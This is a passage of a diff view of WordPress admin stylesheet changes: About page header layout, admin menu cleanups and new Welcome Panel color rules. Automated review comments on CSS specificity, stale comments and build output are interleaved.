+	padding-left: calc(var(--about-header-bg-width) + var(--about-header-bg-offset-inline) + var(--gap));
675
+	font-size: 1.6rem;
659 676
 	line-height: 1.15;
660 677
 }
661 678
 
679
+.credits-php .about__header-text,
680
+.privacy-php .about__header-text {
681
+	margin-bottom: 7rem;
682
+}
683
+
684
+.freedoms-php .about__header-text {
685
+	margin-bottom: 6rem;
686
+}
687
+
662 688
 .about__header-navigation {
689
+	position: relative;
690
+	z-index: 1;
663 691
 	display: flex;
664 692
 	justify-content: center;
665 693
 	padding-top: 0;
@@ -701,9 +729,15 @@
701 729
 	border-color: var(--nav-current);
702 730
 }
703 731
 
704
-@media screen and (max-width: 960px){
732
+@media screen and (max-width: 960px) {
733
+	.about__header {
734
+		--about-header-bg-width: calc(var(--about-header-image-width) * 0.7);
735
+		--about-header-bg-height: calc(var(--about-header-image-height) * 0.7);
736
+		--about-header-bg-offset-inline: calc(var(--gap) * -1);
737
+	}
738
+
705 739
 	.about__header-title h1 {
706
-		font-size: 4.8em;
740
+		font-size: clamp(3rem, 18.46vw - 5.08rem, 6rem);
707 741
 	}
708 742
 }
709 743
 
@@ -722,7 +756,12 @@
722 756
 		margin-left: calc(var(--gap) / 2);
723 757
 	}
724 758
 
725
-	.about__header-text,
759
+	.about__header-text {
760
+		margin-top: 0;
761
+		margin-left: 0;
762
+		padding-right: calc(var(--gap) / 2);
763
+	}
764
+
726 765
 	.about__header-navigation .nav-tab {
727 766
 		margin-top: 0;
728 767
 		margin-left: 0;
@@ -731,13 +770,35 @@
731 770
 	}
732 771
 }
733 772
 
773
+@media screen and (max-width: 600px) {
774
+	.about__header,
775
+	.credits-php .about__header,
776
+	.privacy-php .about__header,
777
+	.freedoms-php .about__header {
778
+		background-image: none;
779
+	}
780
+
781
+	.about__header-title,
782
+	.about__header-text {
783
+		padding-left: calc(var(--gap) / 2) !important;
784
+	}
785
+
786
+	.about__header-title h1 {
787
+		font-size: clamp(2rem, 11.43vw - 0.29rem, 4rem);
788
+	}
789
+}
790
+
734 791
 @media screen and (max-width: 480px) {
735 792
 	.about__header-title p {
736 793
 		font-size: 2.4em;
737 794
 	}
738 795
 
796
+	.about__header-title {
797
+		padding-top: 2rem;
798
+	}
799
+
739 800
 	.about__header-text {
740
-		margin-bottom: 1em;
801
+		margin-bottom: 2rem;
741 802
 	}
742 803
 
743 804
 	.about__header-navigation {
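Review bot: In the `max-width: 480px` block, `.about__header-title { padding-top: 2rem; }` and `.about__header-text { margin-bottom: 2rem; }` have lower specificity than the `.credits-php`, `.privacy-php` and `.freedoms-php` variants added earlier in this file (`padding-top: 6rem` / `3rem`, `margin-bottom: 7rem` / `6rem`), so on those three screens the small-viewport values never apply. If the compact spacing is meant for every About screen, repeat the page-scoped selectors inside the media query.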

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/about-rtl.min.css


+ 152 - 91
app/wp-admin/css/about.css

@@ -21,7 +21,7 @@
21 21
 .about__container {
22 22
 	/* Section backgrounds */
23 23
 	--background: transparent;
24
-	--subtle-background: #def;
24
+	--subtle-background: #f0f0f0;
25 25
 
26 26
 	/* Main text color */
27 27
 	--text: #000;
@@ -29,7 +29,7 @@
29 29
 
30 30
 	/* Accent colors: used in header, on special classes. */
31 31
 	--accent-1: #3858e9; /* Accent background, link color */
32
-	--accent-2: #2d46ba; /* Header background */
32
+	--accent-2: #3858e9; /* Header background */
33 33
 
34 34
 	/* Navigation colors. */
35 35
 	--nav-background: #fff;
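Review bot: The `/* Header background */` comment on `--accent-2` no longer matches the stylesheet: the header hunk further down removes `background-color: var(--accent-2)` and paints `.about__header` with `var(--subtle-background)`. With `--accent-2` now set to the same `#3858e9` as `--accent-1`, either update the comment to say what still consumes it or drop the variable if nothing does.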
@@ -48,14 +48,14 @@
48 48
 .credits-php,
49 49
 .freedoms-php,
50 50
 .privacy-php {
51
-	background: #f0f7ff;
51
+	background: #fff;
52 52
 }
53 53
 
54 54
 .about-php #wpcontent,
55 55
 .credits-php #wpcontent,
56 56
 .freedoms-php #wpcontent,
57 57
 .privacy-php #wpcontent {
58
-	background: linear-gradient(180deg, #fff 50%, #f0f7ff 100%);
58
+	background: #fff;
59 59
 	padding: 0 24px;
60 60
 }
61 61
 
@@ -140,25 +140,19 @@
140 140
 	margin: 0 0 var(--gap);
141 141
 }
142 142
 
143
-.about__section .column {
143
+.about__section .column:not(.is-edge-to-edge) {
144 144
 	padding: var(--gap);
145 145
 }
146 146
 
147
-.about__section + .about__section .column {
148
-	padding-top: 0;
149
-}
150
-
151 147
 .about__section + .about__section .is-section-header {
152 148
 	padding-bottom: var(--gap);
153 149
 }
154 150
 
155 151
 .about__section .column[class*="background-color"],
152
+.about__section:where([class*="background-color"]) .column,
156 153
 .about__section .column.has-border {
157 154
 	padding-top: var(--gap);
158
-}
159
-
160
-.about__section .column.is-edge-to-edge {
161
-	padding: 0;
155
+	padding-bottom: var(--gap);
162 156
 }
163 157
 
164 158
 .about__section .column p:first-of-type {
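Review bot: Deleting `.about__section .column.is-edge-to-edge { padding: 0; }` changes what edge-to-edge columns get from the rule just above it: a column with `is-edge-to-edge` plus `has-border` or a `background-color` class, or any column inside a section matched by the new `:where([class*="background-color"])` selector, now receives `padding-top` and `padding-bottom: var(--gap)` where the removed rule used to reset it. If that is intended, a comment on the selector list would help; if not, add `:not(.is-edge-to-edge)` to those selectors as well.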
@@ -214,7 +208,8 @@
214 208
 }
215 209
 
216 210
 .about__section.has-gutters {
217
-	gap: calc(var(--gap) / 2);
211
+	gap: var(--gap);
212
+	margin-bottom: calc(var(--gap) * 2);
218 213
 }
219 214
 
220 215
 .about__section.has-2-columns {
@@ -222,11 +217,11 @@
222 217
 }
223 218
 
224 219
 .about__section.has-2-columns.is-wider-right {
225
-	grid-template-columns: 1fr 2fr;
220
+	grid-template-columns: 2fr 3fr;
226 221
 }
227 222
 
228 223
 .about__section.has-2-columns.is-wider-left {
229
-	grid-template-columns: 2fr 1fr;
224
+	grid-template-columns: 3fr 2fr;
230 225
 }
231 226
 
232 227
 .about__section.has-2-columns .is-section-header {
@@ -328,13 +323,24 @@
328 323
 	.about__section.has-2-columns.is-wider-left,
329 324
 	.about__section.has-3-columns {
330 325
 		display: block;
331
-		padding-bottom: calc(var(--gap) / 2);
326
+		margin-bottom: calc(var(--gap) / 2);
327
+	}
328
+
329
+	.about__section .column:not(.is-edge-to-edge) {
330
+		padding-top: var(--gap);
331
+		padding-bottom: var(--gap);
332
+	}
333
+
334
+	.about__section.has-2-columns.has-gutters.is-wider-right,
335
+	.about__section.has-2-columns.has-gutters.is-wider-left,
336
+	.about__section.has-3-columns.has-gutters {
337
+		margin-bottom: calc(var(--gap) * 2);
332 338
 	}
333 339
 
334 340
 	.about__section.has-2-columns.has-gutters .column,
335 341
 	.about__section.has-2-columns.has-gutters .column,
336 342
 	.about__section.has-3-columns.has-gutters .column {
337
-		margin-bottom: calc(var(--gap) / 2);
343
+		margin-bottom: var(--gap);
338 344
 	}
339 345
 
340 346
 	.about__section.has-2-columns.has-gutters .column:last-child,
@@ -393,21 +399,25 @@
393 399
 @media screen and (max-width: 600px) {
394 400
 	.about__section.has-2-columns {
395 401
 		display: block;
402
+		margin-bottom: var(--gap);
403
+	}
404
+
405
+	.about__section.has-2-columns:not(.has-gutters) .column:nth-of-type(n) {
406
+		padding-top: calc(var(--gap) / 2);
396 407
 		padding-bottom: calc(var(--gap) / 2);
397 408
 	}
398 409
 
410
+	.about__section.has-2-columns.has-gutters {
411
+		margin-bottom: calc(var(--gap) * 2);
412
+	}
413
+
399 414
 	.about__section.has-2-columns.has-gutters .column {
400
-		margin-bottom: calc(var(--gap) / 2);
415
+		margin-bottom: var(--gap);
401 416
 	}
402 417
 
403 418
 	.about__section.has-2-columns.has-gutters .column:last-child {
404 419
 		margin-bottom: 0;
405 420
 	}
406
-
407
-	.about__section.has-2-columns .column:nth-of-type(n) {
408
-		padding-top: calc(var(--gap) / 2);
409
-		padding-bottom: calc(var(--gap) / 2);
410
-	}
411 421
 }
412 422
 
413 423
 @media screen and (max-width: 480px) {
@@ -451,18 +461,18 @@
451 461
 .about__container h3.is-larger-heading {
452 462
 	margin-top: 0;
453 463
 	margin-bottom: 0.5em;
454
-	font-size: 2em;
455
-	line-height: 1.2;
464
+	font-size: 2rem;
456 465
 	font-weight: 700;
466
+	line-height: 1.16;
457 467
 }
458 468
 
459 469
 .about__container h3,
460 470
 .about__container h1.is-smaller-heading,
461 471
 .about__container h2.is-smaller-heading {
462 472
 	margin-top: 0;
463
-	font-size: 1.6em;
464
-	line-height: 1.3;
465
-	font-weight: 400;
473
+	font-size: 1.625rem;
474
+	font-weight: 700;
475
+	line-height: 1.4;
466 476
 }
467 477
 
468 478
 .about__container p {
@@ -470,6 +480,13 @@
470 480
 	line-height: inherit;
471 481
 }
472 482
 
483
+.about__container p.is-subheading {
484
+	margin-top: 0;
485
+	font-size: 1.5rem;
486
+	font-weight: 300;
487
+	line-height: 160%;
488
+}
489
+
473 490
 .about__section a {
474 491
 	color: var(--accent-1);
475 492
 	text-decoration: underline;
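Review bot: `line-height: 160%` on `p.is-subheading` is the only percentage line-height among the rules this commit touches; the others use unitless values (`1.16`, `1.4`, `1.55`). A percentage is inherited as a computed length, so a child with a different font size keeps the parent's line box. `line-height: 1.6` renders the paragraph the same way and stays consistent with the rest of the file.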
@@ -497,6 +514,10 @@
497 514
 	margin-left: calc(var(--gap) / 2);
498 515
 }
499 516
 
517
+.about__container li {
518
+	margin-bottom: 0.75rem;
519
+}
520
+
500 521
 .about__container img {
501 522
 	margin: 0;
502 523
 	max-width: 100%;
@@ -523,50 +544,14 @@
523 544
 	margin-right: auto;
524 545
 }
525 546
 
526
-.about__container .about__image-comparison {
527
-	position: relative;
528
-	display: inline-block;
529
-	max-width: 100%;
530
-}
531
-
532
-.about__container .about__image-comparison img {
533
-	-webkit-user-select: none;
534
-	user-select: none;
535
-	width: auto;
536
-	max-width: none;
537
-	max-height: 100%;
538
-}
539
-
540
-.about__container .about__image-comparison > img {
541
-	max-width: 100%;
542
-}
543
-
544
-.about__container .about__image-comparison-resize {
545
-	position: absolute !important; /* Needed to override inline style on ResizableBox */
546
-	top: 0;
547
-	bottom: 0;
548
-	left: 0;
549
-	width: 50%;
550
-	max-width: 100%;
551
-}
552
-
553
-.about__container .about__image-comparison.no-js .about__image-comparison-resize {
554
-	overflow: hidden;
555
-	border-right: 2px solid var(--wp-admin-theme-color);
556
-}
557
-
558
-.about__container .about__image-comparison-resize .components-resizable-box__side-handle::before {
559
-	width: 4px;
560
-	right: calc(50% - 2px);
561
-	transition: none;
562
-	animation: none;
563
-	opacity: 1;
564
-}
565
-
566 547
 .about__container .about__image + h3 {
567 548
 	margin-top: 1.5em;
568 549
 }
569 550
 
551
+.about__container .column .about__image {
552
+	margin-bottom: calc(var(--gap) / 2);
553
+}
554
+
570 555
 .about__container hr {
571 556
 	margin: 0;
572 557
 	height: var(--gap);
@@ -589,7 +574,8 @@
589 574
 }
590 575
 
591 576
 .about__section {
592
-	font-size: 1.2em;
577
+	font-size: 1.125rem;
578
+	line-height: 1.55;
593 579
 }
594 580
 
595 581
 .about__section.is-feature {
@@ -611,26 +597,45 @@
611 597
 /* 1.3 - Header */
612 598
 
613 599
 .about__header {
600
+	--about-header-image-width: 521px;
601
+	--about-header-image-height: 504px;
602
+	--about-header-bg-width: var(--about-header-image-width);
603
+	--about-header-bg-height: var(--about-header-image-height);
604
+	--about-header-bg-offset-inline: calc(var(--gap) * -2);
605
+
606
+	position: relative;
614 607
 	margin-bottom: var(--gap);
615 608
 	padding-top: 0;
616
-	background-position: center;
617
-	background-repeat: no-repeat;
618
-	background-size: cover;
619
-	background-image: url('../images/about-header-about.svg');
620
-	background-color: var(--accent-2);
621
-	color: var(--text-light);
609
+	background: var(--subtle-background) url('../images/about-header-about.svg?ver=6.0') no-repeat;
610
+	background-size: var(--about-header-bg-width) var(--about-header-bg-height);
611
+	background-position: right var(--about-header-bg-offset-inline) center;
622 612
 }
623 613
 
624 614
 .credits-php .about__header {
625
-	background-image: url('../images/about-header-credits.svg');
615
+	--about-header-image-width: 477px;
616
+	--about-header-image-height: 470px;
617
+	--about-header-bg-offset-inline: calc(var(--gap) * -4);
618
+
619
+	background-image: url('../images/about-header-credits.svg?ver=6.0');
620
+	background-position: right var(--about-header-bg-offset-inline) top var(--gap);
626 621
 }
627 622
 
628 623
 .freedoms-php .about__header {
629
-	background-image: url('../images/about-header-freedoms.svg');
624
+	--about-header-image-width: 411px;
625
+	--about-header-image-height: 498px;
626
+	--about-header-bg-offset-inline: var(--gap);
627
+
628
+	background-image: url('../images/about-header-freedoms.svg?ver=6.0');
629
+	background-position: right var(--about-header-bg-offset-inline) top calc(var(--gap) * 4);
630 630
 }
631 631
 
632 632
 .privacy-php .about__header {
633
-	background-image: url('../images/about-header-privacy.svg');
633
+	--about-header-image-width: 277px;
634
+	--about-header-image-height: 361px;
635
+	--about-header-bg-offset-inline: var(--gap);
636
+
637
+	background-image: url('../images/about-header-privacy.svg?ver=6.0');
638
+	background-position: right var(--about-header-bg-offset-inline) top var(--gap);
634 639
 }
635 640
 
636 641
 .about__header-image {
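Review bot: The `?ver=6.0` cache-busting suffix is hard-coded in each of the four header `url()` values, so the next artwork change only reaches users if someone remembers to bump all four by hand, here and in the RTL file. Please add a comment next to the first one saying when the suffix must change. The pixel sizes in `--about-header-image-width` and `--about-header-image-height` carry the same coupling to the SVG files and deserve the same note.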
@@ -638,27 +643,50 @@
638 643
 }
639 644
 
640 645
 .about__header-title {
641
-	padding: 2rem 0 0;
642
-	margin: 0 2rem;
646
+	box-sizing: border-box;
647
+	margin: 0 0 0 var(--gap);
648
+	padding: 8rem 0 0;
649
+	padding-right: calc(var(--about-header-bg-width) + var(--about-header-bg-offset-inline) + var(--gap));
650
+}
651
+
652
+.credits-php .about__header-title,
653
+.privacy-php .about__header-title {
654
+	padding-top: 6rem;
655
+}
656
+
657
+.freedoms-php .about__header-title {
658
+	padding-top: 3rem;
643 659
 }
644 660
 
645 661
 .about__header-title h1 {
646
-	margin: 0 0 0.5rem;
662
+	margin: 0 0 1rem;
647 663
 	padding: 0;
648
-	font-size: 4.5rem;
664
+	font-size: clamp(3rem, 18.46vw - 8.08rem, 6rem);
649 665
 	line-height: 1;
650 666
 	font-weight: 400;
651 667
 }
652 668
 
653 669
 .about__header-text {
654
-	max-width: 42rem;
655
-	margin: 0 0 5em;
656
-	padding: 0 2rem;
657
-	font-size: 2rem;
670
+	box-sizing: border-box;
671
+	margin: 0 0 9rem;
672
+	padding: 0 0 0 2rem;
673
+	padding-right: calc(var(--about-header-bg-width) + var(--about-header-bg-offset-inline) + var(--gap));
674
+	font-size: 1.6rem;
658 675
 	line-height: 1.15;
659 676
 }
660 677
 
678
+.credits-php .about__header-text,
679
+.privacy-php .about__header-text {
680
+	margin-bottom: 7rem;
681
+}
682
+
683
+.freedoms-php .about__header-text {
684
+	margin-bottom: 6rem;
685
+}
686
+
661 687
 .about__header-navigation {
688
+	position: relative;
689
+	z-index: 1;
662 690
 	display: flex;
663 691
 	justify-content: center;
664 692
 	padding-top: 0;
@@ -700,9 +728,15 @@
700 728
 	border-color: var(--nav-current);
701 729
 }
702 730
 
703
-@media screen and (max-width: 960px){
731
+@media screen and (max-width: 960px) {
732
+	.about__header {
733
+		--about-header-bg-width: calc(var(--about-header-image-width) * 0.7);
734
+		--about-header-bg-height: calc(var(--about-header-image-height) * 0.7);
735
+		--about-header-bg-offset-inline: calc(var(--gap) * -1);
736
+	}
737
+
704 738
 	.about__header-title h1 {
705
-		font-size: 4.8em;
739
+		font-size: clamp(3rem, 18.46vw - 5.08rem, 6rem);
706 740
 	}
707 741
 }
708 742
 
@@ -721,7 +755,12 @@
721 755
 		margin-right: calc(var(--gap) / 2);
722 756
 	}
723 757
 
724
-	.about__header-text,
758
+	.about__header-text {
759
+		margin-top: 0;
760
+		margin-right: 0;
761
+		padding-left: calc(var(--gap) / 2);
762
+	}
763
+
725 764
 	.about__header-navigation .nav-tab {
726 765
 		margin-top: 0;
727 766
 		margin-right: 0;
@@ -730,13 +769,35 @@
730 769
 	}
731 770
 }
732 771
 
772
+@media screen and (max-width: 600px) {
773
+	.about__header,
774
+	.credits-php .about__header,
775
+	.privacy-php .about__header,
776
+	.freedoms-php .about__header {
777
+		background-image: none;
778
+	}
779
+
780
+	.about__header-title,
781
+	.about__header-text {
782
+		padding-right: calc(var(--gap) / 2) !important;
783
+	}
784
+
785
+	.about__header-title h1 {
786
+		font-size: clamp(2rem, 11.43vw - 0.29rem, 4rem);
787
+	}
788
+}
789
+
733 790
 @media screen and (max-width: 480px) {
734 791
 	.about__header-title p {
735 792
 		font-size: 2.4em;
736 793
 	}
737 794
 
795
+	.about__header-title {
796
+		padding-top: 2rem;
797
+	}
798
+
738 799
 	.about__header-text {
739
-		margin-bottom: 1em;
800
+		margin-bottom: 2rem;
740 801
 	}
741 802
 
742 803
 	.about__header-navigation {
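Review bot: `!important` on `padding-right` in the `max-width: 600px` block looks unnecessary from what this diff shows: the only other `padding-right` declarations on `.about__header-title` and `.about__header-text` are the single-class base rules earlier in the file, which this later rule of equal specificity already overrides. If a rule outside the diff forces it, name that rule in a comment; otherwise drop the flag so later overrides stay possible.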

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/about.min.css


+ 5 - 6
app/wp-admin/css/admin-menu-rtl.css

@@ -40,7 +40,7 @@
40 40
 .icon16 {
41 41
 	height: 18px;
42 42
 	width: 18px;
43
-	padding: 6px 6px;
43
+	padding: 6px;
44 44
 	margin: -6px -8px 0 0;
45 45
 	float: right;
46 46
 }
@@ -162,7 +162,6 @@
162 162
 #adminmenu li {
163 163
 	margin: 0;
164 164
 	padding: 0;
165
-	cursor: pointer;
166 165
 }
167 166
 
168 167
 #adminmenu a {
@@ -346,7 +345,7 @@
346 345
 }
347 346
 
348 347
 #adminmenu .wp-menu-image img {
349
-	padding: 9px 0 0 0;
348
+	padding: 9px 0 0;
350 349
 	opacity: 0.6;
351 350
 	filter: alpha(opacity=60);
352 351
 }
@@ -489,7 +488,7 @@ ul#adminmenu > li.current > a.current:after {
489 488
 #adminmenu li.wp-menu-separator {
490 489
 	height: 5px;
491 490
 	padding: 0;
492
-	margin: 0 0 6px 0;
491
+	margin: 0 0 6px;
493 492
 	cursor: inherit;
494 493
 }
495 494
 
@@ -504,7 +503,7 @@ ul#adminmenu > li.current > a.current:after {
504 503
 	font-weight: 400;
505 504
 	font-size: 14px;
506 505
 	padding: 5px 11px 5px 4px;
507
-	margin: -7px -5px 4px 0px;
506
+	margin: -7px -5px 4px 0;
508 507
 	border-width: 3px 5px 3px 0;
509 508
 	border-style: solid;
510 509
 	border-color: transparent;
@@ -655,7 +654,7 @@ li#wp-admin-bar-menu-toggle {
655 654
 	.auto-fold #adminmenu .wp-has-current-submenu.opensub .wp-submenu,
656 655
 	.auto-fold #adminmenu a.menu-top:focus + .wp-submenu,
657 656
 	.auto-fold #adminmenu .wp-has-current-submenu a.menu-top:focus + .wp-submenu {
658
-		top: 0px;
657
+		top: 0;
659 658
 		right: 36px;
660 659
 	}
661 660
 

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/admin-menu-rtl.min.css


+ 5 - 6
app/wp-admin/css/admin-menu.css

@@ -39,7 +39,7 @@
39 39
 .icon16 {
40 40
 	height: 18px;
41 41
 	width: 18px;
42
-	padding: 6px 6px;
42
+	padding: 6px;
43 43
 	margin: -6px 0 0 -8px;
44 44
 	float: left;
45 45
 }
@@ -161,7 +161,6 @@
161 161
 #adminmenu li {
162 162
 	margin: 0;
163 163
 	padding: 0;
164
-	cursor: pointer;
165 164
 }
166 165
 
167 166
 #adminmenu a {
@@ -345,7 +344,7 @@
345 344
 }
346 345
 
347 346
 #adminmenu .wp-menu-image img {
348
-	padding: 9px 0 0 0;
347
+	padding: 9px 0 0;
349 348
 	opacity: 0.6;
350 349
 	filter: alpha(opacity=60);
351 350
 }
@@ -488,7 +487,7 @@ ul#adminmenu > li.current > a.current:after {
488 487
 #adminmenu li.wp-menu-separator {
489 488
 	height: 5px;
490 489
 	padding: 0;
491
-	margin: 0 0 6px 0;
490
+	margin: 0 0 6px;
492 491
 	cursor: inherit;
493 492
 }
494 493
 
@@ -503,7 +502,7 @@ ul#adminmenu > li.current > a.current:after {
503 502
 	font-weight: 400;
504 503
 	font-size: 14px;
505 504
 	padding: 5px 4px 5px 11px;
506
-	margin: -7px 0px 4px -5px;
505
+	margin: -7px 0 4px -5px;
507 506
 	border-width: 3px 0 3px 5px;
508 507
 	border-style: solid;
509 508
 	border-color: transparent;
@@ -654,7 +653,7 @@ li#wp-admin-bar-menu-toggle {
654 653
 	.auto-fold #adminmenu .wp-has-current-submenu.opensub .wp-submenu,
655 654
 	.auto-fold #adminmenu a.menu-top:focus + .wp-submenu,
656 655
 	.auto-fold #adminmenu .wp-has-current-submenu a.menu-top:focus + .wp-submenu {
657
-		top: 0px;
656
+		top: 0;
658 657
 		left: 36px;
659 658
 	}
660 659
 

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/admin-menu.min.css


+ 1 - 1
app/wp-admin/css/color-picker-rtl.css

@@ -12,7 +12,7 @@
12 12
 /* Needs higher specificiity. */
13 13
 .wp-picker-container .wp-color-result.button {
14 14
 	min-height: 30px;
15
-	margin: 0 0px 6px 6px;
15
+	margin: 0 0 6px 6px;
16 16
 	padding: 0 30px 0 0;
17 17
 	font-size: 11px;
18 18
 }

+ 1 - 1
app/wp-admin/css/color-picker.css

@@ -11,7 +11,7 @@
11 11
 /* Needs higher specificiity. */
12 12
 .wp-picker-container .wp-color-result.button {
13 13
 	min-height: 30px;
14
-	margin: 0 6px 6px 0px;
14
+	margin: 0 6px 6px 0;
15 15
 	padding: 0 0 0 30px;
16 16
 	font-size: 11px;
17 17
 }

+ 17 - 0
app/wp-admin/css/colors/_admin.scss

@@ -781,3 +781,20 @@ div#wp-responsive-toggle a:before {
781 781
 		color: $link;
782 782
 	}
783 783
 }
784
+
785
+/* Welcome Panel */
786
+.welcome-panel {
787
+	background-color: mix($dashboard-accent-1, white, 12%);
788
+}
789
+
790
+.welcome-panel-header-image .about-six {
791
+	fill: $dashboard-accent-1;
792
+}
793
+
794
+.welcome-panel-header-image .about-zero {
795
+	fill: $dashboard-accent-2;
796
+}
797
+
798
+[class*="welcome-panel-icon"] {
799
+	background-color: $dashboard-icon-background;
800
+}
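Review bot: `[class*="welcome-panel-icon"]` is a substring match with no ancestor, so it sets `background-color` on any element in the admin whose class attribute contains that text, including classes added by plugins. Scope it under `.welcome-panel` or list the icon classes explicitly.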

+ 7 - 0
app/wp-admin/css/colors/_variables.scss

@@ -1,5 +1,6 @@
1 1
 // assign default value to all undefined variables
2 2
 
3
+$scheme-name: "default" !default;
3 4
 
4 5
 // core variables
5 6
 
@@ -62,4 +63,10 @@ $adminbar-recovery-exit-background-alt: mix(black, $adminbar-recovery-exit-backg
62 63
 
63 64
 $menu-customizer-text: mix( $base-color, $text-color, 40% ) !default;
64 65
 
66
+// Dashboard Colors
67
+
68
+$dashboard-accent-1: $highlight-color !default;
69
+$dashboard-accent-2: $base-color !default;
70
+$dashboard-icon-background: $dashboard-accent-2 !default;
71
+
65 72
 $low-contrast-theme: "false" !default;

+ 17 - 0
app/wp-admin/css/colors/blue/colors-rtl.css

@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703
   border-bottom-color: #e1a948;
704 704
   color: #0073aa;
705
+}
706
+
707
+/* Welcome Panel */
708
+.welcome-panel {
709
+  background-color: #e1ecf0;
710
+}
711
+
712
+.welcome-panel-header-image .about-six {
713
+  fill: #096484;
714
+}
715
+
716
+.welcome-panel-header-image .about-zero {
717
+  fill: #52accc;
718
+}
719
+
720
+[class*=welcome-panel-icon] {
721
+  background-color: #096484;
705 722
 }

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/colors/blue/colors-rtl.min.css


+ 17 - 0
app/wp-admin/css/colors/blue/colors.css

@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703
   border-bottom-color: #e1a948;
704 704
   color: #0073aa;
705
+}
706
+
707
+/* Welcome Panel */
708
+.welcome-panel {
709
+  background-color: #e1ecf0;
710
+}
711
+
712
+.welcome-panel-header-image .about-six {
713
+  fill: #096484;
714
+}
715
+
716
+.welcome-panel-header-image .about-zero {
717
+  fill: #52accc;
718
+}
719
+
720
+[class*=welcome-panel-icon] {
721
+  background-color: #096484;
705 722
 }

File diff suppressed because it is too large
+ 1 - 1
app/wp-admin/css/colors/blue/colors.min.css


+ 3 - 0
app/wp-admin/css/colors/blue/colors.scss

@@ -1,3 +1,4 @@
1
+$scheme-name: "blue";
1 2
 $base-color: #52accc;
2 3
 $icon-color: #e5f8ff;
3 4
 $highlight-color: #096484;
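Review bot: `$scheme-name` is set here and given a `"default"` fallback in `_variables.scss`, but the rules added to `_admin.scss` in this commit do not read it. Please add a comment in `_variables.scss` saying what consumes the value, or leave the variable out until something does.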
@@ -8,4 +9,6 @@ $menu-submenu-text: #e2ecf1;
8 9
 $menu-submenu-focus-text: #fff;
9 10
 $menu-submenu-background: #4796b3;
10 11
 
12
+$dashboard-icon-background: $highlight-color;
13
+
11 14
 @import "../_admin.scss";

+ 26 - 9
app/wp-admin/css/colors/coffee/colors-rtl.css

@@ -167,7 +167,7 @@ textarea:focus {
167 167
   color: #9ea476;
168 168
 }
169 169
 .wp-core-ui .wp-ui-text-icon {
170
-  color: #f3f2f1;
170
+  color: hsl(27.6923076923deg, 7%, 95%);
171 171
 }
172 172
 
173 173
 /* List tables */
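Review bot: Replacing `#f3f2f1` with `hsl(27.6923076923deg, 7%, 95%)` is unrelated to the Welcome Panel rules this file gains, and it repeats in every hunk of the coffee stylesheets while `coffee/colors.scss` only adds `$scheme-name`. That points to a change in how the compiled CSS was generated rather than a deliberate edit. Please confirm the build output is expected, and prefer the hex form so the value matches the other colors in the file (`#9ea476`, `#c7a589`).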
@@ -196,7 +196,7 @@ textarea:focus {
196 196
 }
197 197
 
198 198
 #adminmenu div.wp-menu-image:before {
199
-  color: #f3f2f1;
199
+  color: hsl(27.6923076923deg, 7%, 95%);
200 200
 }
201 201
 
202 202
 #adminmenu a:hover,
@@ -308,7 +308,7 @@ ul#adminmenu > li.current > a.current:after {
308 308
 
309 309
 /* Admin Menu: collapse button */
310 310
 #collapse-button {
311
-  color: #f3f2f1;
311
+  color: hsl(27.6923076923deg, 7%, 95%);
312 312
 }
313 313
 
314 314
 #collapse-button:hover,
@@ -333,7 +333,7 @@ ul#adminmenu > li.current > a.current:after {
333 333
 #wpadminbar .ab-icon:before,
334 334
 #wpadminbar .ab-item:before,
335 335
 #wpadminbar .ab-item:after {
336
-  color: #f3f2f1;
336
+  color: hsl(27.6923076923deg, 7%, 95%);
337 337
 }
338 338
 
339 339
 #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item,
@@ -377,7 +377,7 @@ ul#adminmenu > li.current > a.current:after {
377 377
 
378 378
 #wpadminbar .quicklinks li .blavatar,
379 379
 #wpadminbar .menupop .menupop > .ab-item:before {
380
-  color: #f3f2f1;
380
+  color: hsl(27.6923076923deg, 7%, 95%);
381 381
 }
382 382
 
383 383
 #wpadminbar .quicklinks .menupop ul li a:hover,
@@ -412,12 +412,12 @@ ul#adminmenu > li.current > a.current:after {
412 412
 
413 413
 #wpadminbar.mobile .quicklinks .hover .ab-icon:before,
414 414
 #wpadminbar.mobile .quicklinks .hover .ab-item:before {
415
-  color: #f3f2f1;
415
+  color: hsl(27.6923076923deg, 7%, 95%);
416 416
 }
417 417
 
418 418
 /* Admin Bar: search */
419 419
 #wpadminbar #adminbarsearch:before {
420
-  color: #f3f2f1;
420
+  color: hsl(27.6923076923deg, 7%, 95%);
421 421
 }
422 422
 
423 423
 #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus {
@@ -553,7 +553,7 @@ body.more-filters-opened .more-filters:focus:before {
553 553
 
554 554
 /* Responsive Component */
555 555
 div#wp-responsive-toggle a:before {
556
-  color: #f3f2f1;
556
+  color: hsl(27.6923076923deg, 7%, 95%);
557 557
 }
558 558
 
559 559
 .wp-responsive-open div#wp-responsive-toggle a {
@@ -566,7 +566,7 @@ div#wp-responsive-toggle a:before {
566 566
 }
567 567
 
568 568
 .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before {
569
-  color: #f3f2f1;
569
+  color: hsl(27.6923076923deg, 7%, 95%);
570 570
 }
571 571
 
572 572
 /* TinyMCE */
@@ -669,4 +669,21 @@ div#wp-responsive-toggle a:before {
669 669
